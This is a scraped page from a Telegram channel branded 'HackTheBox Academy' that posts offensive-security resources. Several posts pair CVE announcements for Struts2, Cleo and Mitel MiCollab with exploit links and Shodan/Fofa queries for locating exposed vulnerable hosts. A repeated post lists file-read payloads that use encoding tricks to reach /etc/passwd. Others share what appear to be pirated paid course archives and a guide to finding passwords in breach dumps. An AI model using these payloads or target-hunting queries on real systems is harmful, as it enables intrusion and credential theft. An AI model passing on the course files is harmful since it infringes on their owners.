en
Feedback
HackTheBox Academy

HackTheBox Academy

Closed channel

🔴Learn About #Linux 🔴Learn About #Windows 🔴Learn About #CVE 🔴Learn About #EXPLOIT 🔴Learn About #Vulnerability ✅ADMIN : @NullByte0x1

Show more
3 327
Subscribers
No data24 hours
-207 days
-9330 days
Posts Archive
↔️ CVE-2024-53677 ❗️ potentially allowing attackers to execute arbitrary code remotely. This vulnerability arises from flaws
↔️ CVE-2024-53677 ❗️ potentially allowing attackers to execute arbitrary code remotely. This vulnerability arises from flaws in the file upload logic, which can be exploited to perform path traversal and malicious file uploads. 🖥 Exploit - POC 🔎ZoomEye:
app="Apache Struts2"
🔎Fofa:
app="Struts2"
#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

How to Find 𝐌𝐢𝐬𝐜𝐨𝐧𝐟𝐢𝐠𝐮𝐫𝐞𝐝 𝐩𝐡𝐩𝐌𝐲𝐀𝐝𝐦𝐢𝐧.
In this video, We will show you how to find misconfigured phpMyAdmin setups in web applications.
❗️ Nuclei-Templates 🔎Shodan:
http.html:"phpMyAdmin"
🔎Fofa:
title="phpMyAdmin"
⭐️ Big TNX To Video Provider. #Ethical_Hacker #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

↔️ CVE-2024-50623 ❗️ In Cleo Harmony before 5.8.0.21, VLTrader before 5.8.0.21, and LexiCom before 5.8.0.21, there is an unre
↔️ CVE-2024-50623 ❗️ In Cleo Harmony before 5.8.0.21, VLTrader before 5.8.0.21, and LexiCom before 5.8.0.21, there is an unrestricted file upload and download that could lead to remote code execution. 🖥 Exploit - POC 🔎Shodan:
Server: Cleo
🔎Fofa:
server="Cleo"
#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

🎩 CENT ⭐️ Community Edition Nuclei Templates, A Simple Tool That Allows You To Organize All The Nuclei Templates Offered By
🎩 CENT ⭐️ Community Edition Nuclei Templates, A Simple Tool That Allows You To Organize All The Nuclei Templates Offered By The Community In One Place. 🖥 GitHub 🛡 Installition:
go install -v github.com/xm1k3/cent@latest
#Tools #Hunt #Security #Nuclei ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

🕷 Payloads for LFR file:/etc/passwd%3F/ file:/etc%252Fpasswd/ file:/etc%252Fpasswd%3F/ file:///etc/%3F/../passwd file:${br}/
🕷 Payloads for LFR
file:/etc/passwd%3F/ 
file:/etc%252Fpasswd/ 
file:/etc%252Fpasswd%3F/ 
file:///etc/%3F/../passwd 
file:${br}/et${u}c%252Fpas${te}swd%3F/ 
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/

🕷 Payloads for LFR file:/etc/passwd%3F/ file:/etc%252Fpasswd/ file:/etc%252Fpasswd%3F/ file:///etc/%3F/../passwd file:${br}/
🕷 Payloads for LFR
file:/etc/passwd%3F/ 
file:/etc%252Fpasswd/ 
file:/etc%252Fpasswd%3F/ 
file:///etc/%3F/../passwd 
file:${br}/et${u}c%252Fpas${te}swd%3F/ 
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/

HackTheBox_Academy - OffSec - PEN-200(2024).zip3029.74 MB

🩸🩸🫵🩸🩸🩸 💥 🕷 PEN 200 - Penetration Testing with Kali Linux.(2024) #Course #Pentest #PWK #Hacking #Ethical_Hacker ➖➖➖➖➖➖
🩸🩸🫵🩸🩸🩸 💥 🕷 PEN 200 - Penetration Testing with Kali Linux.(2024) #Course #Pentest #PWK #Hacking #Ethical_Hacker ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

💻 TLD-Scraping Is A Tool That Allow You To Search For Domain By TLD. 🖥 GitHub If It Was Useful For You, Dont Forget To Give
💻 TLD-Scraping Is A Tool That Allow You To Search For Domain By TLD. 🖥 GitHub
If It Was Useful For You, Dont Forget To Give Star On GitHub.
#Tools #Hunt #Security ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

+2
BH - Tactical OSINT For Pentesters.zip.0013500.00 MB

🩸🩸🫵🩸🩸🩸 💥 🕷 Black Hat Tactical OSINT for Pentesters #Course #Black_Team #Osint #Hacking #Security #Ethical_Hacker ➖➖➖➖
🩸🩸🫵🩸🩸🩸 💥 🕷 Black Hat Tactical OSINT for Pentesters #Course #Black_Team #Osint #Hacking #Security #Ethical_Hacker ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

160 views ... Only 40 votes? 😔 Tnx ...

📧 Finding Email Passwords in Dumps with h8mail. https://www.hackers-arise.com/post/osint-finding-email-passwords-in-dumps-wi
📧 Finding Email Passwords in Dumps with h8mail. https://www.hackers-arise.com/post/osint-finding-email-passwords-in-dumps-with-h8mail #OSINT

↔️ Critical Vulnerability 🔹 Forgotten Database Dumps.
↔️ Critical Vulnerability 🔹 Forgotten Database Dumps.

😡SQLMAP Command Generator. ✈️ Links: https://acorzo1983.github.io/SQLMapCG/ #Ethical_Hacker #Exploit #Sql #Injection #Pentes
😡SQLMAP Command Generator. ✈️ Links: https://acorzo1983.github.io/SQLMapCG/ #Ethical_Hacker #Exploit #Sql #Injection #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

What You Guys Need? ♥️ OfCourse That We Need Reactions And Vote.
Anonymous voting

↔️ CVE-2024-41713 ❗️ Critical Mitel MiCollab Flaw Exposes Systems to Unauthorized File and Admin Access. 🖥 Exploit - POC 🔎
↔️ CVE-2024-41713 ❗️ Critical Mitel MiCollab Flaw Exposes Systems to Unauthorized File and Admin Access. 🖥 Exploit - POC 🔎 Hunter:
product.name="Mitel MiCollab"
🔎 Shodan:
http.favicon.hash:-1922044295
🔎 fofa:
app="Mitel-Network-Products"
#Ethical_Hacker #Exploit #LFI #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

↔️ CVE-2024-41713 ❗️ Critical Mitel MiCollab Flaw Exposes Systems to Unauthorized File and Admin Access. 🖥 Exploit - POC 🔎
↔️ CVE-2024-41713 ❗️ Critical Mitel MiCollab Flaw Exposes Systems to Unauthorized File and Admin Access. 🖥 Exploit - POC 🔎 Hunter:
product.name="Mitel MiCollab"
🔎 Shodan:
http.favicon.hash:-1922044295
🔎 fofa.info:
app="Mitel-Network-Products"
#Ethical_Hacker #Exploit #LFI #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security